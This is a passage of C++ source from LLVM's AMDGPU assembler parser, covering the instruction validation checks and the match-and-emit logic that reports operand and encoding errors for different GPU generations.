case AMDGPU::V_MOVRELS_B32_sdwa_gfx10:
case AMDGPU::V_MOVRELSD_B32_sdwa_gfx10:
case AMDGPU::V_MOVRELSD_2_B32_sdwa_gfx10:
return true;
default:
return false;
}
}
// movrels* opcodes should only allow VGPRS as src0.
// This is specified in .td description for vop1/vop3,
// but sdwa is handled differently. See isSDWAOperand.
bool AMDGPUAsmParser::validateMovrels(const MCInst &Inst,
const OperandVector &Operands) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::SDWA) == 0 || !IsMovrelsSDWAOpcode(Opc))
return true;
const int Src0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0);
assert(Src0Idx != -1);
SMLoc ErrLoc;
const MCOperand &Src0 = Inst.getOperand(Src0Idx);
if (Src0.isReg()) {
auto Reg = mc2PseudoReg(Src0.getReg());
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
if (!isSGPR(Reg, TRI))
return true;
ErrLoc = getRegLoc(Reg, Operands);
} else {
ErrLoc = getConstLoc(Operands);
}
Error(ErrLoc, "source operand must be a VGPR");
return false;
}
bool AMDGPUAsmParser::validateMAIAccWrite(const MCInst &Inst,
const OperandVector &Operands) {
const unsigned Opc = Inst.getOpcode();
if (Opc != AMDGPU::V_ACCVGPR_WRITE_B32_vi)
return true;
const int Src0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0);
assert(Src0Idx != -1);
const MCOperand &Src0 = Inst.getOperand(Src0Idx);
if (!Src0.isReg())
return true;
auto Reg = mc2PseudoReg(Src0.getReg());
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
if (isSGPR(Reg, TRI)) {
Error(getRegLoc(Reg, Operands),
"source operand must be either a VGPR or an inline constant");
return false;
}
return true;
}
bool AMDGPUAsmParser::validateMFMA(const MCInst &Inst,
const OperandVector &Operands) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::IsMAI) == 0)
return true;
const int Src2Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src2);
if (Src2Idx == -1)
return true;
const MCOperand &Src2 = Inst.getOperand(Src2Idx);
if (!Src2.isReg())
return true;
MCRegister Src2Reg = Src2.getReg();
MCRegister DstReg = Inst.getOperand(0).getReg();
if (Src2Reg == DstReg)
return true;
const MCRegisterInfo *TRI = getContext().getRegisterInfo();
if (TRI->getRegClass(Desc.OpInfo[0].RegClass).getSizeInBits() <= 128)
return true;
if (TRI->regsOverlap(Src2Reg, DstReg)) {
Error(getRegLoc(mc2PseudoReg(Src2Reg), Operands),
"source 2 operand must not partially overlap with dst");
return false;
}
return true;
}
bool AMDGPUAsmParser::validateDivScale(const MCInst &Inst) {
switch (Inst.getOpcode()) {
default:
return true;
case V_DIV_SCALE_F32_gfx6_gfx7:
case V_DIV_SCALE_F32_vi:
case V_DIV_SCALE_F32_gfx10:
case V_DIV_SCALE_F64_gfx6_gfx7:
case V_DIV_SCALE_F64_vi:
case V_DIV_SCALE_F64_gfx10:
break;
}
// TODO: Check that src0 = src1 or src2.
for (auto Name : {AMDGPU::OpName::src0_modifiers,
AMDGPU::OpName::src2_modifiers,
AMDGPU::OpName::src2_modifiers}) {
if (Inst.getOperand(AMDGPU::getNamedOperandIdx(Inst.getOpcode(), Name))
.getImm() &
SISrcMods::ABS) {
return false;
}
}
return true;
}
bool AMDGPUAsmParser::validateMIMGD16(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
int D16Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::d16);
if (D16Idx >= 0 && Inst.getOperand(D16Idx).getImm()) {
if (isCI() || isSI())
return false;
}
return true;
}
bool AMDGPUAsmParser::validateMIMGDim(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opc);
if ((Desc.TSFlags & SIInstrFlags::MIMG) == 0)
return true;
int DimIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dim);
if (DimIdx < 0)
return true;
long Imm = Inst.getOperand(DimIdx).getImm();
if (Imm < 0 || Imm >= 8)
return false;
return true;
}
static bool IsRevOpcode(const unsigned Opcode)
{
switch (Opcode) {
case AMDGPU::V_SUBREV_F32_e32:
case AMDGPU::V_SUBREV_F32_e64:
case AMDGPU::V_SUBREV_F32_e32_gfx10:
case AMDGPU::V_SUBREV_F32_e32_gfx6_gfx7:
case AMDGPU::V_SUBREV_F32_e32_vi:
case AMDGPU::V_SUBREV_F32_e64_gfx10:
case AMDGPU::V_SUBREV_F32_e64_gfx6_gfx7:
case AMDGPU::V_SUBREV_F32_e64_vi:
case AMDGPU::V_SUBREV_CO_U32_e32:
case AMDGPU::V_SUBREV_CO_U32_e64:
case AMDGPU::V_SUBREV_I32_e32_gfx6_gfx7:
case AMDGPU::V_SUBREV_I32_e64_gfx6_gfx7:
case AMDGPU::V_SUBBREV_U32_e32:
case AMDGPU::V_SUBBREV_U32_e64:
case AMDGPU::V_SUBBREV_U32_e32_gfx6_gfx7:
case AMDGPU::V_SUBBREV_U32_e32_vi:
case AMDGPU::V_SUBBREV_U32_e64_gfx6_gfx7:
case AMDGPU::V_SUBBREV_U32_e64_vi:
case AMDGPU::V_SUBREV_U32_e32:
case AMDGPU::V_SUBREV_U32_e64:
case AMDGPU::V_SUBREV_U32_e32_gfx9:
case AMDGPU::V_SUBREV_U32_e32_vi:
case AMDGPU::V_SUBREV_U32_e64_gfx9:
case AMDGPU::V_SUBREV_U32_e64_vi:
case AMDGPU::V_SUBREV_F16_e32:
case AMDGPU::V_SUBREV_F16_e64:
case AMDGPU::V_SUBREV_F16_e32_gfx10:
case AMDGPU::V_SUBREV_F16_e32_vi:
case AMDGPU::V_SUBREV_F16_e64_gfx10:
case AMDGPU::V_SUBREV_F16_e64_vi:
case AMDGPU::V_SUBREV_U16_e32:
case AMDGPU::V_SUBREV_U16_e64:
case AMDGPU::V_SUBREV_U16_e32_vi:
case AMDGPU::V_SUBREV_U16_e64_vi:
case AMDGPU::V_SUBREV_CO_U32_e32_gfx9:
case AMDGPU::V_SUBREV_CO_U32_e64_gfx10:
case AMDGPU::V_SUBREV_CO_U32_e64_gfx9:
case AMDGPU::V_SUBBREV_CO_U32_e32_gfx9:
case AMDGPU::V_SUBBREV_CO_U32_e64_gfx9:
case AMDGPU::V_SUBREV_NC_U32_e32_gfx10:
case AMDGPU::V_SUBREV_NC_U32_e64_gfx10:
case AMDGPU::V_SUBREV_CO_CI_U32_e32_gfx10:
case AMDGPU::V_SUBREV_CO_CI_U32_e64_gfx10:
case AMDGPU::V_LSHRREV_B32_e32:
case AMDGPU::V_LSHRREV_B32_e64:
case AMDGPU::V_LSHRREV_B32_e32_gfx6_gfx7:
case AMDGPU::V_LSHRREV_B32_e64_gfx6_gfx7:
case AMDGPU::V_LSHRREV_B32_e32_vi:
case AMDGPU::V_LSHRREV_B32_e64_vi:
case AMDGPU::V_LSHRREV_B32_e32_gfx10:
case AMDGPU::V_LSHRREV_B32_e64_gfx10:
case AMDGPU::V_ASHRREV_I32_e32:
case AMDGPU::V_ASHRREV_I32_e64:
case AMDGPU::V_ASHRREV_I32_e32_gfx10:
case AMDGPU::V_ASHRREV_I32_e32_gfx6_gfx7:
case AMDGPU::V_ASHRREV_I32_e32_vi:
case AMDGPU::V_ASHRREV_I32_e64_gfx10:
case AMDGPU::V_ASHRREV_I32_e64_gfx6_gfx7:
case AMDGPU::V_ASHRREV_I32_e64_vi:
case AMDGPU::V_LSHLREV_B32_e32:
case AMDGPU::V_LSHLREV_B32_e64:
case AMDGPU::V_LSHLREV_B32_e32_gfx10:
case AMDGPU::V_LSHLREV_B32_e32_gfx6_gfx7:
case AMDGPU::V_LSHLREV_B32_e32_vi:
case AMDGPU::V_LSHLREV_B32_e64_gfx10:
case AMDGPU::V_LSHLREV_B32_e64_gfx6_gfx7:
case AMDGPU::V_LSHLREV_B32_e64_vi:
case AMDGPU::V_LSHLREV_B16_e32:
case AMDGPU::V_LSHLREV_B16_e64:
case AMDGPU::V_LSHLREV_B16_e32_vi:
case AMDGPU::V_LSHLREV_B16_e64_vi:
case AMDGPU::V_LSHLREV_B16_gfx10:
case AMDGPU::V_LSHRREV_B16_e32:
case AMDGPU::V_LSHRREV_B16_e64:
case AMDGPU::V_LSHRREV_B16_e32_vi:
case AMDGPU::V_LSHRREV_B16_e64_vi:
case AMDGPU::V_LSHRREV_B16_gfx10:
case AMDGPU::V_ASHRREV_I16_e32:
case AMDGPU::V_ASHRREV_I16_e64:
case AMDGPU::V_ASHRREV_I16_e32_vi:
case AMDGPU::V_ASHRREV_I16_e64_vi:
case AMDGPU::V_ASHRREV_I16_gfx10:
case AMDGPU::V_LSHLREV_B64_e64:
case AMDGPU::V_LSHLREV_B64_gfx10:
case AMDGPU::V_LSHLREV_B64_vi:
case AMDGPU::V_LSHRREV_B64_e64:
case AMDGPU::V_LSHRREV_B64_gfx10:
case AMDGPU::V_LSHRREV_B64_vi:
case AMDGPU::V_ASHRREV_I64_e64:
case AMDGPU::V_ASHRREV_I64_gfx10:
case AMDGPU::V_ASHRREV_I64_vi:
case AMDGPU::V_PK_LSHLREV_B16:
case AMDGPU::V_PK_LSHLREV_B16_gfx10:
case AMDGPU::V_PK_LSHLREV_B16_vi:
case AMDGPU::V_PK_LSHRREV_B16:
case AMDGPU::V_PK_LSHRREV_B16_gfx10:
case AMDGPU::V_PK_LSHRREV_B16_vi:
case AMDGPU::V_PK_ASHRREV_I16:
case AMDGPU::V_PK_ASHRREV_I16_gfx10:
case AMDGPU::V_PK_ASHRREV_I16_vi:
return true;
default:
return false;
}
}
Optional<StringRef> AMDGPUAsmParser::validateLdsDirect(const MCInst &Inst) {
using namespace SIInstrFlags;
const unsigned Opcode = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opcode);
// lds_direct register is defined so that it can be used
// with 9-bit operands only. Ignore encodings which do not accept these.
const auto Enc = VOP1 | VOP2 | VOP3 | VOPC | VOP3P | SIInstrFlags::SDWA;
if ((Desc.TSFlags & Enc) == 0)
return None;
for (auto SrcName : {OpName::src0, OpName::src1, OpName::src2}) {
auto SrcIdx = getNamedOperandIdx(Opcode, SrcName);
if (SrcIdx == -1)
break;
const auto &Src = Inst.getOperand(SrcIdx);
if (Src.isReg() && Src.getReg() == LDS_DIRECT) {
if (isGFX90A())
return StringRef("lds_direct is not supported on this GPU");
if (IsRevOpcode(Opcode) || (Desc.TSFlags & SIInstrFlags::SDWA))
return StringRef("lds_direct cannot be used with this instruction");
if (SrcName != OpName::src0)
return StringRef("lds_direct may be used as src0 only");
}
}
return None;
}
SMLoc AMDGPUAsmParser::getFlatOffsetLoc(const OperandVector &Operands) const {
for (unsigned i = 1, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
if (Op.isFlatOffset())
return Op.getStartLoc();
}
return getLoc();
}
bool AMDGPUAsmParser::validateFlatOffset(const MCInst &Inst,
const OperandVector &Operands) {
uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
if ((TSFlags & SIInstrFlags::FLAT) == 0)
return true;
auto Opcode = Inst.getOpcode();
auto OpNum = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::offset);
assert(OpNum != -1);
const auto &Op = Inst.getOperand(OpNum);
if (!hasFlatOffsets() && Op.getImm() != 0) {
Error(getFlatOffsetLoc(Operands),
"flat offset modifier is not supported on this GPU");
return false;
}
// For FLAT segment the offset must be positive;
// MSB is ignored and forced to zero.
if (TSFlags & (SIInstrFlags::FlatGlobal | SIInstrFlags::FlatScratch)) {
unsigned OffsetSize = AMDGPU::getNumFlatOffsetBits(getSTI(), true);
if (!isIntN(OffsetSize, Op.getImm())) {
Error(getFlatOffsetLoc(Operands),
Twine("expected a ") + Twine(OffsetSize) + "-bit signed offset");
return false;
}
} else {
unsigned OffsetSize = AMDGPU::getNumFlatOffsetBits(getSTI(), false);
if (!isUIntN(OffsetSize, Op.getImm())) {
Error(getFlatOffsetLoc(Operands),
Twine("expected a ") + Twine(OffsetSize) + "-bit unsigned offset");
return false;
}
}
return true;
}
SMLoc AMDGPUAsmParser::getSMEMOffsetLoc(const OperandVector &Operands) const {
// Start with second operand because SMEM Offset cannot be dst or src0.
for (unsigned i = 2, e = Operands.size(); i != e; ++i) {
AMDGPUOperand &Op = ((AMDGPUOperand &)*Operands[i]);
if (Op.isSMEMOffset())
return Op.getStartLoc();
}
return getLoc();
}
bool AMDGPUAsmParser::validateSMEMOffset(const MCInst &Inst,
const OperandVector &Operands) {
if (isCI() || isSI())
return true;
uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
if ((TSFlags & SIInstrFlags::SMRD) == 0)
return true;
auto Opcode = Inst.getOpcode();
auto OpNum = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::offset);
if (OpNum == -1)
return true;
const auto &Op = Inst.getOperand(OpNum);
if (!Op.isImm())
return true;
uint64_t Offset = Op.getImm();
bool IsBuffer = AMDGPU::getSMEMIsBuffer(Opcode);
if (AMDGPU::isLegalSMRDEncodedUnsignedOffset(getSTI(), Offset) ||
AMDGPU::isLegalSMRDEncodedSignedOffset(getSTI(), Offset, IsBuffer))
return true;
Error(getSMEMOffsetLoc(Operands),
(isVI() || IsBuffer) ? "expected a 20-bit unsigned offset" :
"expected a 21-bit signed offset");
return false;
}
bool AMDGPUAsmParser::validateSOPLiteral(const MCInst &Inst) const {
unsigned Opcode = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opcode);
if (!(Desc.TSFlags & (SIInstrFlags::SOP2 | SIInstrFlags::SOPC)))
return true;
const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);
const int OpIndices[] = { Src0Idx, Src1Idx };
unsigned NumExprs = 0;
unsigned NumLiterals = 0;
uint32_t LiteralValue;
for (int OpIdx : OpIndices) {
if (OpIdx == -1) break;
const MCOperand &MO = Inst.getOperand(OpIdx);
// Exclude special imm operands (like that used by s_set_gpr_idx_on)
if (AMDGPU::isSISrcOperand(Desc, OpIdx)) {
if (MO.isImm() && !isInlineConstant(Inst, OpIdx)) {
uint32_t Value = static_cast<uint32_t>(MO.getImm());
if (NumLiterals == 0 || LiteralValue != Value) {
LiteralValue = Value;
++NumLiterals;
}
} else if (MO.isExpr()) {
++NumExprs;
}
}
}
return NumLiterals + NumExprs <= 1;
}
bool AMDGPUAsmParser::validateOpSel(const MCInst &Inst) {
const unsigned Opc = Inst.getOpcode();
if (Opc == AMDGPU::V_PERMLANE16_B32_gfx10 ||
Opc == AMDGPU::V_PERMLANEX16_B32_gfx10) {
int OpSelIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::op_sel);
unsigned OpSel = Inst.getOperand(OpSelIdx).getImm();
if (OpSel & ~3)
return false;
}
return true;
}
bool AMDGPUAsmParser::validateDPP(const MCInst &Inst,
const OperandVector &Operands) {
const unsigned Opc = Inst.getOpcode();
int DppCtrlIdx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::dpp_ctrl);
if (DppCtrlIdx < 0)
return true;
unsigned DppCtrl = Inst.getOperand(DppCtrlIdx).getImm();
if (!AMDGPU::isLegal64BitDPPControl(DppCtrl)) {
// DPP64 is supported for row_newbcast only.
int Src0Idx = AMDGPU::getNamedOperandIdx(Opc, AMDGPU::OpName::src0);
if (Src0Idx >= 0 &&
getMRI()->getSubReg(Inst.getOperand(Src0Idx).getReg(), AMDGPU::sub1)) {
SMLoc S = getImmLoc(AMDGPUOperand::ImmTyDppCtrl, Operands);
Error(S, "64 bit dpp only supports row_newbcast");
return false;
}
}
return true;
}
// Check if VCC register matches wavefront size
bool AMDGPUAsmParser::validateVccOperand(unsigned Reg) const {
auto FB = getFeatureBits();
return (FB[AMDGPU::FeatureWavefrontSize64] && Reg == AMDGPU::VCC) ||
(FB[AMDGPU::FeatureWavefrontSize32] && Reg == AMDGPU::VCC_LO);
}
// One unique literal can be used. VOP3 literal is only allowed in GFX10+
bool AMDGPUAsmParser::validateVOPLiteral(const MCInst &Inst,
const OperandVector &Operands) {
unsigned Opcode = Inst.getOpcode();
const MCInstrDesc &Desc = MII.get(Opcode);
const int ImmIdx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::imm);
if (!(Desc.TSFlags & (SIInstrFlags::VOP3 | SIInstrFlags::VOP3P)) &&
ImmIdx == -1)
return true;
const int Src0Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src0);
const int Src1Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src1);
const int Src2Idx = AMDGPU::getNamedOperandIdx(Opcode, AMDGPU::OpName::src2);
const int OpIndices[] = {Src0Idx, Src1Idx, Src2Idx, ImmIdx};
unsigned NumExprs = 0;
unsigned NumLiterals = 0;
uint32_t LiteralValue;
for (int OpIdx : OpIndices) {
if (OpIdx == -1)
continue;
const MCOperand &MO = Inst.getOperand(OpIdx);
if (!MO.isImm() && !MO.isExpr())
continue;
if (!AMDGPU::isSISrcOperand(Desc, OpIdx))
continue;
if (OpIdx == Src2Idx && (Desc.TSFlags & SIInstrFlags::IsMAI) &&
getFeatureBits()[AMDGPU::FeatureMFMAInlineLiteralBug]) {
Error(getConstLoc(Operands),
"inline constants are not allowed for this operand");
return false;
}
if (MO.isImm() && !isInlineConstant(Inst, OpIdx)) {
uint32_t Value = static_cast<uint32_t>(MO.getImm());
if (NumLiterals == 0 || LiteralValue != Value) {
LiteralValue = Value;
++NumLiterals;
}
} else if (MO.isExpr()) {
++NumExprs;
}
}
NumLiterals += NumExprs;
if (!NumLiterals)
return true;
if (ImmIdx == -1 && !getFeatureBits()[AMDGPU::FeatureVOP3Literal]) {
Error(getLitLoc(Operands), "literal operands are not supported");
return false;
}
if (NumLiterals > 1) {
Error(getLitLoc(Operands), "only one literal operand is allowed");
return false;
}
return true;
}
// Returns -1 if not a register, 0 if VGPR and 1 if AGPR.
static int IsAGPROperand(const MCInst &Inst, uint16_t NameIdx,
const MCRegisterInfo *MRI) {
int OpIdx = AMDGPU::getNamedOperandIdx(Inst.getOpcode(), NameIdx);
if (OpIdx < 0)
return -1;
const MCOperand &Op = Inst.getOperand(OpIdx);
if (!Op.isReg())
return -1;
unsigned Sub = MRI->getSubReg(Op.getReg(), AMDGPU::sub0);
auto Reg = Sub ? Sub : Op.getReg();
const MCRegisterClass &AGPR32 = MRI->getRegClass(AMDGPU::AGPR_32RegClassID);
return AGPR32.contains(Reg) ? 1 : 0;
}
bool AMDGPUAsmParser::validateAGPRLdSt(const MCInst &Inst) const {
uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
if ((TSFlags & (SIInstrFlags::FLAT | SIInstrFlags::MUBUF |
SIInstrFlags::MTBUF | SIInstrFlags::MIMG |
SIInstrFlags::DS)) == 0)
return true;
uint16_t DataNameIdx = (TSFlags & SIInstrFlags::DS) ? AMDGPU::OpName::data0
: AMDGPU::OpName::vdata;
const MCRegisterInfo *MRI = getMRI();
int DstAreg = IsAGPROperand(Inst, AMDGPU::OpName::vdst, MRI);
int DataAreg = IsAGPROperand(Inst, DataNameIdx, MRI);
if ((TSFlags & SIInstrFlags::DS) && DataAreg >= 0) {
int Data2Areg = IsAGPROperand(Inst, AMDGPU::OpName::data1, MRI);
if (Data2Areg >= 0 && Data2Areg != DataAreg)
return false;
}
auto FB = getFeatureBits();
if (FB[AMDGPU::FeatureGFX90AInsts]) {
if (DataAreg < 0 || DstAreg < 0)
return true;
return DstAreg == DataAreg;
}
return DstAreg < 1 && DataAreg < 1;
}
bool AMDGPUAsmParser::validateVGPRAlign(const MCInst &Inst) const {
auto FB = getFeatureBits();
if (!FB[AMDGPU::FeatureGFX90AInsts])
return true;
const MCRegisterInfo *MRI = getMRI();
const MCRegisterClass &VGPR32 = MRI->getRegClass(AMDGPU::VGPR_32RegClassID);
const MCRegisterClass &AGPR32 = MRI->getRegClass(AMDGPU::AGPR_32RegClassID);
for (unsigned I = 0, E = Inst.getNumOperands(); I != E; ++I) {
const MCOperand &Op = Inst.getOperand(I);
if (!Op.isReg())
continue;
unsigned Sub = MRI->getSubReg(Op.getReg(), AMDGPU::sub0);
if (!Sub)
continue;
if (VGPR32.contains(Sub) && ((Sub - AMDGPU::VGPR0) & 1))
return false;
if (AGPR32.contains(Sub) && ((Sub - AMDGPU::AGPR0) & 1))
return false;
}
return true;
}
// gfx90a has an undocumented limitation:
// DS_GWS opcodes must use even aligned registers.
bool AMDGPUAsmParser::validateGWS(const MCInst &Inst,
const OperandVector &Operands) {
if (!getFeatureBits()[AMDGPU::FeatureGFX90AInsts])
return true;
int Opc = Inst.getOpcode();
if (Opc != AMDGPU::DS_GWS_INIT_vi && Opc != AMDGPU::DS_GWS_BARRIER_vi &&
Opc != AMDGPU::DS_GWS_SEMA_BR_vi)
return true;
const MCRegisterInfo *MRI = getMRI();
const MCRegisterClass &VGPR32 = MRI->getRegClass(AMDGPU::VGPR_32RegClassID);
int Data0Pos =
AMDGPU::getNamedOperandIdx(Inst.getOpcode(), AMDGPU::OpName::data0);
assert(Data0Pos != -1);
auto Reg = Inst.getOperand(Data0Pos).getReg();
auto RegIdx = Reg - (VGPR32.contains(Reg) ? AMDGPU::VGPR0 : AMDGPU::AGPR0);
if (RegIdx & 1) {
SMLoc RegLoc = getRegLoc(Reg, Operands);
Error(RegLoc, "vgpr must be even aligned");
return false;
}
return true;
}
bool AMDGPUAsmParser::validateCoherencyBits(const MCInst &Inst,
const OperandVector &Operands,
const SMLoc &IDLoc) {
int CPolPos = AMDGPU::getNamedOperandIdx(Inst.getOpcode(),
AMDGPU::OpName::cpol);
if (CPolPos == -1)
return true;
unsigned CPol = Inst.getOperand(CPolPos).getImm();
uint64_t TSFlags = MII.get(Inst.getOpcode()).TSFlags;
if ((TSFlags & (SIInstrFlags::SMRD)) &&
(CPol & ~(AMDGPU::CPol::GLC | AMDGPU::CPol::DLC))) {
Error(IDLoc, "invalid cache policy for SMRD instruction");
return false;
}
if (isGFX90A() && (CPol & CPol::SCC)) {
SMLoc S = getImmLoc(AMDGPUOperand::ImmTyCPol, Operands);
StringRef CStr(S.getPointer());
S = SMLoc::getFromPointer(&CStr.data()[CStr.find("scc")]);
Error(S, "scc is not supported on this GPU");
return false;
}
if (!(TSFlags & (SIInstrFlags::IsAtomicNoRet | SIInstrFlags::IsAtomicRet)))
return true;
if (TSFlags & SIInstrFlags::IsAtomicRet) {
if (!(TSFlags & SIInstrFlags::MIMG) && !(CPol & CPol::GLC)) {
Error(IDLoc, "instruction must use glc");
return false;
}
} else {
if (CPol & CPol::GLC) {
SMLoc S = getImmLoc(AMDGPUOperand::ImmTyCPol, Operands);
StringRef CStr(S.getPointer());
S = SMLoc::getFromPointer(&CStr.data()[CStr.find("glc")]);
Error(S, "instruction must not use glc");
return false;
}
}
return true;
}
bool AMDGPUAsmParser::validateInstruction(const MCInst &Inst,
const SMLoc &IDLoc,
const OperandVector &Operands) {
if (auto ErrMsg = validateLdsDirect(Inst)) {
Error(getRegLoc(LDS_DIRECT, Operands), *ErrMsg);
return false;
}
if (!validateSOPLiteral(Inst)) {
Error(getLitLoc(Operands),
"only one literal operand is allowed");
return false;
}
if (!validateVOPLiteral(Inst, Operands)) {
return false;
}
if (!validateConstantBusLimitations(Inst, Operands)) {
return false;
}
if (!validateEarlyClobberLimitations(Inst, Operands)) {
return false;
}
if (!validateIntClampSupported(Inst)) {
Error(getImmLoc(AMDGPUOperand::ImmTyClampSI, Operands),
"integer clamping is not supported on this GPU");
return false;
}
if (!validateOpSel(Inst)) {
Error(getImmLoc(AMDGPUOperand::ImmTyOpSel, Operands),
"invalid op_sel operand");
return false;
}
if (!validateDPP(Inst, Operands)) {
return false;
}
// For MUBUF/MTBUF d16 is a part of opcode, so there is nothing to validate.
if (!validateMIMGD16(Inst)) {
Error(getImmLoc(AMDGPUOperand::ImmTyD16, Operands),
"d16 modifier is not supported on this GPU");
return false;
}
if (!validateMIMGDim(Inst)) {
Error(IDLoc, "dim modifier is required on this GPU");
return false;
}
if (!validateMIMGMSAA(Inst)) {
Error(getImmLoc(AMDGPUOperand::ImmTyDim, Operands),
"invalid dim; must be MSAA type");
return false;
}
if (!validateMIMGDataSize(Inst)) {
Error(IDLoc,
"image data size does not match dmask and tfe");
return false;
}
if (!validateMIMGAddrSize(Inst)) {
Error(IDLoc,
"image address size does not match dim and a16");
return false;
}
if (!validateMIMGAtomicDMask(Inst)) {
Error(getImmLoc(AMDGPUOperand::ImmTyDMask, Operands),
"invalid atomic image dmask");
return false;
}
if (!validateMIMGGatherDMask(Inst)) {
Error(getImmLoc(AMDGPUOperand::ImmTyDMask, Operands),
"invalid image_gather dmask: only one bit must be set");
return false;
}
if (!validateMovrels(Inst, Operands)) {
return false;
}
if (!validateFlatOffset(Inst, Operands)) {
return false;
}
if (!validateSMEMOffset(Inst, Operands)) {
return false;
}
if (!validateMAIAccWrite(Inst, Operands)) {
return false;
}
if (!validateMFMA(Inst, Operands)) {
return false;
}
if (!validateCoherencyBits(Inst, Operands, IDLoc)) {
return false;
}
if (!validateAGPRLdSt(Inst)) {
Error(IDLoc, getFeatureBits()[AMDGPU::FeatureGFX90AInsts]
? "invalid register class: data and dst should be all VGPR or AGPR"
: "invalid register class: agpr loads and stores not supported on this GPU"
);
return false;
}
if (!validateVGPRAlign(Inst)) {
Error(IDLoc,
"invalid register class: vgpr tuples must be 64 bit aligned");
return false;
}
if (!validateGWS(Inst, Operands)) {
return false;
}
if (!validateDivScale(Inst)) {
Error(IDLoc, "ABS not allowed in VOP3B instructions");
return false;
}
if (!validateCoherencyBits(Inst, Operands, IDLoc)) {
return false;
}
return true;
}
static std::string AMDGPUMnemonicSpellCheck(StringRef S,
const FeatureBitset &FBS,
unsigned VariantID = 0);
static bool AMDGPUCheckMnemonic(StringRef Mnemonic,
const FeatureBitset &AvailableFeatures,
unsigned VariantID);
bool AMDGPUAsmParser::isSupportedMnemo(StringRef Mnemo,
const FeatureBitset &FBS) {
return isSupportedMnemo(Mnemo, FBS, getAllVariants());
}
bool AMDGPUAsmParser::isSupportedMnemo(StringRef Mnemo,
const FeatureBitset &FBS,
ArrayRef<unsigned> Variants) {
for (auto Variant : Variants) {
if (AMDGPUCheckMnemonic(Mnemo, FBS, Variant))
return true;
}
return false;
}
bool AMDGPUAsmParser::checkUnsupportedInstruction(StringRef Mnemo,
const SMLoc &IDLoc) {
FeatureBitset FBS = ComputeAvailableFeatures(getSTI().getFeatureBits());
// Check if requested instruction variant is supported.
if (isSupportedMnemo(Mnemo, FBS, getMatchedVariants()))
return false;
// This instruction is not supported.
// Clear any other pending errors because they are no longer relevant.
getParser().clearPendingErrors();
// Requested instruction variant is not supported.
// Check if any other variants are supported.
StringRef VariantName = getMatchedVariantName();
if (!VariantName.empty() && isSupportedMnemo(Mnemo, FBS)) {
return Error(IDLoc,
Twine(VariantName,
" variant of this instruction is not supported"));
}
// Finally check if this instruction is supported on any other GPU.
if (isSupportedMnemo(Mnemo, FeatureBitset().set())) {
return Error(IDLoc, "instruction not supported on this GPU");
}
// Instruction not supported on any GPU. Probably a typo.
std::string Suggestion = AMDGPUMnemonicSpellCheck(Mnemo, FBS);
return Error(IDLoc, "invalid instruction" + Suggestion);
}
bool AMDGPUAsmParser::MatchAndEmitInstruction(SMLoc IDLoc, unsigned &Opcode,
OperandVector &Operands,
MCStreamer &Out,
uint64_t &ErrorInfo,
bool MatchingInlineAsm) {
MCInst Inst;
unsigned Result = Match_Success;
for (auto Variant : getMatchedVariants()) {
uint64_t EI;
auto R = MatchInstructionImpl(Operands, Inst, EI, MatchingInlineAsm,
Variant);
// We order match statuses from least to most specific. We use most specific
// status as resulting
// Match_MnemonicFail < Match_InvalidOperand < Match_MissingFeature < Match_PreferE32
if ((R == Match_Success) ||
(R == Match_PreferE32) ||
(R == Match_MissingFeature && Result != Match_PreferE32) ||
(R == Match_InvalidOperand && Result != Match_MissingFeature
&& Result != Match_PreferE32) ||
(R == Match_MnemonicFail && Result != Match_InvalidOperand
&& Result != Match_MissingFeature
&& Result != Match_PreferE32)) {
Result = R;
ErrorInfo = EI;
}
if (R == Match_Success)
break;
}
if (Result == Match_Success) {
if (!validateInstruction(Inst, IDLoc, Operands)) {
return true;
}
Inst.setLoc(IDLoc);
Out.emitInstruction(Inst, getSTI());
return false;
}
StringRef Mnemo = ((AMDGPUOperand &)*Operands[0]).getToken();
if (checkUnsupportedInstruction(Mnemo, IDLoc)) {
return true;
}
switch (Result) {
default: break;
case Match_MissingFeature:
// It has been verified that the specified instruction
// mnemonic is valid. A match was found but it requires
// features which are not supported on this GPU.
return Error(IDLoc, "operands are not valid for this GPU or mode");
case Match_InvalidOperand: {
SMLoc ErrorLoc = IDLoc;
if (ErrorInfo != ~0ULL) {
if (ErrorInfo >= Operands.size()) {
return Error(IDLoc, "too few operands for instruction");
}
ErrorLoc = ((AMDGPUOperand &)*Operands[ErrorInfo]).getStartLoc();
if (ErrorLoc == SMLoc())
ErrorLoc = IDLoc;
}
return Error(ErrorLoc, "invalid operand for instruction");
}
case Match_PreferE32:
return Error(IDLoc, "internal error: instruction without _e64 suffix "
"should be encoded as e32");
case Match_MnemonicFail:
llvm_unreachable("Invalid instructions should have been handled already");
}
llvm_unreachable("Implement any new match types added!");
}
